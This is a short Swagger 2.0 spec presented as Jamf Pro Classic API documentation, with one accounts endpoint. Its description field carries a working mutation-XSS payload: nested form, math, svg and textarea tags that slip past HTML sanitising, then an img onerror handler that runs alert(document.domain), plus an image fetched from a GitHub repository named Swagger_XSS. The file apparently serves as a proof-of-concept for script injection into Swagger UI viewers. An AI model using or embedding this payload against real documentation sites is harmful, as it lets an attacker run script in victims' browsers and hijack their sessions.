swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1><img src='https://raw.githubusercontent.com/maxntv24/Swagger_XSS/main/cat.png'>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
definitions:
  '':
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Account:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
tags:
  - description: Operations on Jamf Pro accounts
    name: accounts
